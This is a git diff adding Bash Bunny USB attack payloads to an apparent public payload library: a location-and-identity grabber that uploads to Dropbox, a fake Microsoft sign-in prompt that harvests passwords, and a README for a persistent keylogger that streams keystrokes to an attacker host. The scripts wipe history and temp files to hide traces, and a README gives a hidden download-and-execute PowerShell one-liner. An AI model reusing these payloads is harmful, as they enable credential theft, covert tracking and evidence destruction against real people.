+
+}
+
+$FN = Get-fullName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-email {
+
+ try {
+
+ $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
+ return $email
+ }
+
+# If no email is detected function will return backup message for sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "An email was not found"
+ return "No Email Detected"
+ -ErrorAction SilentlyContinue
+ }
+}
+
+$EM = Get-email
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current locaton
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+$GL = Get-GeoLocation
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+echo $FN >> $env:TMP\$FileName
+echo $EM >> $env:TMP\$FileName
+echo $GL >> $env:TMP\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+# Upload output file to dropbox
+
+$TargetFilePath="/$FileName"
+$SourceFilePath="$env:TMP\$FileName"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $DropBoxAccessToken
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/payloads/library/Incident_Response/-BB-ET-Phone-Home/README.md b/payloads/library/Incident_Response/-BB-ET-Phone-Home/README.md
new file mode 100644
index 00000000..4796efa2
--- /dev/null
+++ b/payloads/library/Incident_Response/-BB-ET-Phone-Home/README.md
@@ -0,0 +1,117 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# ET Phone Home
+
+A script I put together to locate your stolen devices, or your "stolen" baited devices
+
+## Description
+
+This program is meant to locate your devices. When someone plugs it into their computer
+Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
+latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
+Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
+
+## Getting Started
+
+### Dependencies
+
+* DropBox - Your Shared link for the intended file
+* Windows 7,10,11
+
+(back to top)
+
+### Executing program
+
+* Your device is plugged into the targets computer
+* A one liner command in the run box will execute the script on the bash bunny
+Something Like What you see below will be in your loot folder:
+
+NAME
+
+EMAIL
+
+LATITUDE AND LONGITUDE
+
+```
+Jakoby
+
+jakoby@example.com
+
+ Latitude Longitude
+ -------- ---------
+37.778919 -122.416313
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+Kalani
+
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ET-Phone-Home)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+
+
+(back to top)
diff --git a/payloads/library/Incident_Response/-BB-ET-Phone-Home/payload.txt b/payloads/library/Incident_Response/-BB-ET-Phone-Home/payload.txt
new file mode 100644
index 00000000..76ce3d1d
--- /dev/null
+++ b/payloads/library/Incident_Response/-BB-ET-Phone-Home/payload.txt
@@ -0,0 +1,22 @@
+# Title: ET-Phone-Home
+# Description: this script will download and execute your locator script to find your device when it is plugged in
+# Author: I am Jakoby
+# Version: 1.0
+# Category: Incident_Response
+# Attackmodes: HID, Storage
+# Target: Windows 10, 11
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE
+
+LED STAGE1
+
+QUACK DELAY 3000
+QUACK GUI r
+QUACK DELAY 100
+LED STAGE2
+QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ET-Phone-Home.ps1')"
+QUACK ENTER
diff --git a/payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1 b/payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1
new file mode 100644
index 00000000..c50de216
--- /dev/null
+++ b/payloads/library/credentials/-BB-Credz-Plz/Credz-Plz.ps1
@@ -0,0 +1,178 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
+
+.DESCRIPTION
+ A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
+ This will be followed by a fake authentication ui prompt.
+ If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
+ Once the target enters their credentials their information will be uploaded to your Bash Bunny
+
+#>
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+# Creating loot folder
+
+# Get Drive Letter
+$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
+
+# Test if directory exists if not create directory in loot folder to store file
+$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
+
+if(!(Test-Path -Path $TARGETDIR )){
+ mkdir $TARGETDIR
+}
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to generate the ui.prompt you will use to harvest their credentials
+#>
+
+function Get-Creds {
+do{
+$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
+ if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
+ [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
+ Get-Creds
+}
+$creds = $cred.GetNetworkCredential() | fl
+return $creds
+ # ...
+
+ $done = $true
+} until ($done)
+
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to pause the script until a mouse movement is detected
+#>
+
+function Pause-Script{
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
+#>
+
+function Caps-Off {
+Add-Type -AssemblyName System.Windows.Forms
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
+}
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
+#>
+
+Pause-Script
+
+Caps-Off
+
+Add-Type -AssemblyName System.Windows.Forms
+
+[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
+
+$creds = Get-Creds
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to save the gathered credentials to a file in the temp directory
+#>
+
+echo $creds >> $env:TMP\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This exfiltrates your loot to the Bash Bunny
+#>
+
+Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
diff --git a/payloads/library/credentials/-BB-Credz-Plz/README.md b/payloads/library/credentials/-BB-Credz-Plz/README.md
new file mode 100644
index 00000000..0f9b198e
--- /dev/null
+++ b/payloads/library/credentials/-BB-Credz-Plz/README.md
@@ -0,0 +1,102 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Credz-Plz
+
+A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
+
+## Description
+
+A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
+This will be followed by a fake authentication ui prompt.
+If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
+Once the target enters their credentials their information will be uploaded to your dropbox for collection
+
+![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)
+
+![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+I am Jakoby
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/payloads/library/credentials/-BB-Credz-Plz/payload.txt b/payloads/library/credentials/-BB-Credz-Plz/payload.txt
new file mode 100644
index 00000000..b6650db1
--- /dev/null
+++ b/payloads/library/credentials/-BB-Credz-Plz/payload.txt
@@ -0,0 +1,22 @@
+# Title: Credz-Plz
+# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
+# Author: I am Jakoby
+# Version: 1.0
+# Category: Recon
+# Attackmodes: HID, Storage
+# Target: Windows 10, 11
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE
+
+LED STAGE1
+
+QUACK DELAY 3000
+QUACK GUI r
+QUACK DELAY 100
+LED STAGE2
+QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
+QUACK ENTER
diff --git a/payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg b/payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg
new file mode 100644
index 00000000..3330e2a4
Binary files /dev/null and b/payloads/library/credentials/-BB-Credz-Plz/sign-in.jpg differ
diff --git a/payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg b/payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg
new file mode 100644
index 00000000..ff0aad93
Binary files /dev/null and b/payloads/library/credentials/-BB-Credz-Plz/unusual-sign-in.jpg differ
diff --git a/payloads/library/credentials/BunnyLogger/README.md b/payloads/library/credentials/BunnyLogger/README.md
new file mode 100644
index 00000000..7c19270f
--- /dev/null
+++ b/payloads/library/credentials/BunnyLogger/README.md
@@ -0,0 +1,62 @@
+## About:
+* Title: BunnyLogger
+* Description: Key logger which sends each and every key stroke of target remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Credentials
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
+
+### Features:
+* Live keystroke capturing.
+* Detailed key logs.
+* Persistent
+* Autostart payload on boot.
+
+### Workflow:
+* Encoding payload and injecting on target's system.
+* Checks whether internet is connected to the target system.
+* If internet is connected then it sends raw keystrokes to attacker.
+* Attacker processes raw keystrokes.
+
+### Changes to be made in payload.sh:
+* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
+* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payload/switch1/ |
+| payload.sh | /payload/ |
+| xinput | /tools/ |
+
+### Usage:
+1. Encode payload.txt and inject into target's system.
+2. Start netcat listner on attacking system:
+
+* `nc -lvp > ` use this command to create new logfile with raw keystrokes.
+* `nc -lvp >> ` use this command to append raw keystrokes to existing logfile.
+3. Process raw keystrokes using BunnyLoggerDecoder utility:
+```
+./bunnyLoggerDecoder
+bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
+
+Usage:
+Decode captured log: [./bunnyLoggerDecoder -f -m -o